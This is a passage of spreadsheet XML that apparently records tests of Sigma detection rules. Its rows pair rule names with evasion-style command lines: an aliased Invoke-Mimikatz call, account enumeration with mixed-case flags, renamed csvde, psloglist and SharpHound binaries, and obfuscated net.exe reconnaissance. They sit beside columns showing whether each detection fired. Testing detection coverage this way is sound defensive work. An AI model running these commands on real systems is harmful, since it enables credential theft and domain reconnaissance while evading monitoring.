          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1182" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I118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182" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1182" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1183" ht="15.75" customHeight="1" s="42">
      <c r="A1183" s="43" t="n"/>
      <c r="B1183" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1183" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1183" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1183" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F1183" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1183" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1183" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1183" s="43" t="n"/>
      <c r="J1183" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1183" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1184" ht="15.75" customHeight="1" s="42">
      <c r="A1184" s="43" t="n"/>
      <c r="B1184" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1184" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1184" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1184" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F1184" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1184" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1184" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1184" s="43" t="n"/>
      <c r="J1184" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1184" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1185" ht="15.75" customHeight="1" s="42">
      <c r="A1185" s="43" t="n"/>
      <c r="B1185" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1185" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1185" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1185" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F1185" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1185" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1185" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1185" s="43" t="n"/>
      <c r="J1185" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1185" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1186" ht="15.75" customHeight="1" s="42">
      <c r="A1186" s="43" t="n"/>
      <c r="B1186" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1186" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1186" s="43" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1186" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F1186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1186" s="43" t="n"/>
      <c r="J1186" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1186" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1187" ht="15.75" customHeight="1" s="42">
      <c r="A1187" s="36" t="n"/>
      <c r="B1187" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1187" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1187" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1187" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F1187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1187" s="36" t="n"/>
      <c r="J1187" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1187" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1188" ht="15.75" customHeight="1" s="42">
      <c r="A1188" s="36" t="n"/>
      <c r="B1188" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1188" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1188" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1188" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F1188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1188" s="36" t="n"/>
      <c r="J1188" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1188" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1189" ht="15.75" customHeight="1" s="42">
      <c r="A1189" s="43" t="n"/>
      <c r="B1189" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1189" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1189" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1189" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F1189" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1189" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1189" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1189" s="43" t="n"/>
      <c r="J1189" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1189" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1190" ht="15.75" customHeight="1" s="42">
      <c r="A1190" s="43" t="n"/>
      <c r="B1190" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1190" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1190" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1190" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F1190" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1190" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1190" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1190" s="43" t="n"/>
      <c r="J1190" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1190" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1191" ht="15.75" customHeight="1" s="42">
      <c r="A1191" s="43" t="n"/>
      <c r="B1191" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1191" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1191" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1191" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnD "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F1191" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1191" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1191" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1191" s="43" t="n"/>
      <c r="J1191" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1191" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1192" ht="15.75" customHeight="1" s="42">
      <c r="A1192" s="43" t="n"/>
      <c r="B1192" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1192" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1192" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1192" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commANd "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F1192" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1192" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1192" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1192" s="36" t="n"/>
      <c r="J1192" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1192" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1193" ht="15.75" customHeight="1" s="42">
      <c r="A1193" s="43" t="n"/>
      <c r="B1193" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1193" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1193" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1193" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F1193" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1193" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1193" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1193" s="36" t="n"/>
      <c r="J1193" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1193" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1194" ht="15.75" customHeight="1" s="42">
      <c r="A1194" s="43" t="n"/>
      <c r="B1194" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1194" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1194" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1194" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F1194" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1194" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1194" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1194" s="43" t="n"/>
      <c r="J1194" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1194" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1195" ht="15.75" customHeight="1" s="42">
      <c r="A1195" s="43" t="n"/>
      <c r="B1195" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1195" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1195" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1195" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmaND "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F1195" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1195" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1195" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1195" s="43" t="n"/>
      <c r="J1195" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1195" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1196" ht="15.75" customHeight="1" s="42">
      <c r="A1196" s="43" t="n"/>
      <c r="B1196" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1196" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1196" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1196" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F1196" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1196" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1196" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1196" s="43" t="n"/>
      <c r="J1196" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1196" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1197" ht="15.75" customHeight="1" s="42">
      <c r="A1197" s="43" t="n"/>
      <c r="B1197" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1197" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1197" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1197" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaNd "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F1197" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1197" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1197" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1197" s="43" t="n"/>
      <c r="J1197" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1197" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1198" ht="15.75" customHeight="1" s="42">
      <c r="A1198" s="43" t="n"/>
      <c r="B1198" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C1198" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D1198" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E1198" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F1198" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1198" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1198" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1198" s="43" t="n"/>
      <c r="J1198" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1198" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1199" ht="15.75" customHeight="1" s="42">
      <c r="A1199" s="43" t="n"/>
      <c r="B1199" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1199" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1199" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1199" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe -d 1 security</t>
        </is>
      </c>
      <c r="F1199" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1199" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1199" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1199" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1199" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1199" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1200" ht="15.75" customHeight="1" s="42">
      <c r="A1200" s="43" t="n"/>
      <c r="B1200" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1200" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1200" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1200" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe /"d" 1 security</t>
        </is>
      </c>
      <c r="F1200" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1200" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1200" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1200" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1200" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1200" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1201" ht="15.75" customHeight="1" s="42">
      <c r="A1201" s="43" t="n"/>
      <c r="B1201" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1201" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1201" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1201" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe -"d" 1 security</t>
        </is>
      </c>
      <c r="F1201" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1201" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1201" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1201" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1201" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1201" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1202" ht="15.75" customHeight="1" s="42">
      <c r="A1202" s="43" t="n"/>
      <c r="B1202" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C1202" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D1202" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E1202" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\psloglist.exe C:\Windows\Temp\evtlogr.exe &amp;&amp; C:\Windows\Temp\evtlogr.exe -D 1 security</t>
        </is>
      </c>
      <c r="F1202" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1202" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1202" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1202" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1202" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1202" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1203" ht="15.75" customHeight="1" s="42">
      <c r="A1203" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1203" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C1203" s="36" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D1203" s="36" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E1203" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\csvde.exe C:\Users\Public\Update.exe &amp;&amp; C:\Users\Public\Update.exe /f C:\Users\Public\ad_export.csv</t>
        </is>
      </c>
      <c r="F1203" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1203" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1203" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1203" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1203" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1203" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1204" ht="15.75" customHeight="1" s="42">
      <c r="A1204" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1204" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C1204" s="36" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D1204" s="36" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E1204" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\csvde.exe C:\Users\Public\Update.exe &amp;&amp; C:\Users\Public\Update.exe -"f" C:\Users\Public\ad_export.csv</t>
        </is>
      </c>
      <c r="F1204" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1204" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1204" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1204" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1204" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1204" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1205" ht="15.75" customHeight="1" s="42">
      <c r="A1205" s="43" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B1205" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_csvde_export</t>
        </is>
      </c>
      <c r="C1205" s="36" t="inlineStr">
        <is>
          <t>Active Directory Structure Export Via Csvde.EXE</t>
        </is>
      </c>
      <c r="D1205" s="36" t="inlineStr">
        <is>
          <t>e5d36acd-acb4-4c6f-a13f-9eb203d50099</t>
        </is>
      </c>
      <c r="E1205" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\csvde.exe C:\Users\Public\Update.exe &amp;&amp; C:\Users\Public\Update.exe /"f" C:\Users\Public\ad_export.csv</t>
        </is>
      </c>
      <c r="F1205" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1205" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1205" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1205" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1205" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1205" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1206" ht="15.75" customHeight="1" s="42">
      <c r="A1206" s="43" t="n"/>
      <c r="B1206" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1206" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1206" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1206" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F1206" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1206" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1206" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1206" s="43" t="n"/>
      <c r="J1206" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1206" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1207" ht="15.75" customHeight="1" s="42">
      <c r="A1207" s="43" t="n"/>
      <c r="B1207" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1207" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1207" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1207" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F1207" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1207" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1207" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1207" s="43" t="n"/>
      <c r="J1207" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1207" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1208" ht="15.75" customHeight="1" s="42">
      <c r="A1208" s="43" t="n"/>
      <c r="B1208" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C1208" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D1208" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E1208" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F1208" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1208" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1208" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1208" s="43" t="n"/>
      <c r="J1208" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1208" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1209" ht="15.75" customHeight="1" s="42">
      <c r="A1209" s="43" t="n"/>
      <c r="B1209" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1209" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1209" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1209" s="36" t="inlineStr">
        <is>
          <t>net user /domain</t>
        </is>
      </c>
      <c r="F1209" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1209" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1209" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1209" s="43" t="n"/>
      <c r="J1209" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1209" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1210" ht="15.75" customHeight="1" s="42">
      <c r="A1210" s="43" t="n"/>
      <c r="B1210" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1210" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1210" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1210" s="36" t="inlineStr">
        <is>
          <t>net loc^algroup administrators /Do</t>
        </is>
      </c>
      <c r="F1210" s="36" t="b">
        <v>1</v>
      </c>
